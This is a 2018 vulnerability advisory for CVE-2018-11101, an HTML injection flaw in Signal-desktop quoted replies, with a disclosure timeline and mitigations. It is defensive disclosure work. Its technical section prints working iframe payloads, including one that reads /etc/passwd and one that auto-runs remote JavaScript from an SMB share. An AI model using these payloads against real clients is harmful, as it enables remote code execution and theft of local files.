Title: Signal-desktop HTML tag injection variant 2 Date Published: 2018-05-16 Last Update: 2018-05-16 CVE Name: CVE-2018-11101 Class: Code injection Remotely Exploitable: Yes Locally Exploitable: No Vendors contacted: Signal.org Vulnerability Description: Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (Cross-site scripting). This is a new variant of CVE-2018-10994. Vulnerable Packages: Signal-desktop messenger v1.7.1 Signal-desktop messenger v1.8.0 Signal-desktop messenger v1.9.0 Signal-desktop messenger v1.10.0 Signal-desktop messenger v1.10.1 Solution/Vendor Information/Workaround: Do not trust user input. Sanitize it by encoding HTML tags or filtering them. Also, a CSP header is missing, that would deter the action of iframes. Include “frame-src ‘none'” or, if required, “frame-src ‘self'” in the CSP declaration. For final users: Upgrade to signal-desktop messenger v1.11 Credits: This vulnerability was found and researched by Barrera Oro, Iván Ariel (@HacKanCuBa), Bryant, Matt (@IAmMandatory), Ortega, Alfredo (@ortegaalfredo) and Rizzo, Juliano (@julianor). Technical Description – Exploit/Concept Code After publishing CVE-2018-10994, Matt discovered that the vulnerability prevailed but the attack was a bit different: the attacker needs to send HTML code directly as a message, and then reply to that message to trigger this vulnerability. The Signal-desktop software fails to sanitize specific HTML tags that can be used to inject HTML code into remote chat windows when replying to a HTML message. Specifically the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable. In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in a SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to it. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the Signal-Desktop client by sending a specially crafted message and then replying to it with any text or content in the reply (it doesn’t matter). Examples: Show an iframe with some text: <iframe srcdoc="<p>PWONED!!</p>"></iframe> Display content of user’s own /etc/passwd file: <iframe src="/etc/passwd"></iframe> Include and auto-execute a remote JavaScript file (for Windows clients): <iframe src="\\XXX.XXX.XXX.XXX\Temp\test.html"></iframe> Show a displacing base64-encoded image (bypass “click to download image”): <marquee><img src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="/></marquee> Timeline: 2018-05-14 19:00 GMT-3: vuln discovered 2018-05-14 20:00 GMT-3: emailed Signal security team 2018-05-14 20:21 GMT-3: reply from Signal: vuln confirmed & patch ongoing 2018-05-14 21:47 GMT-3: signal-desktop update published 2018-05-16 11:00 GMT-3: public disclosure References: Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…development CVE-2018-11101 write-ups: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection-variant-2/ https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted-replies/ CVE-2018-10994 write-up: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/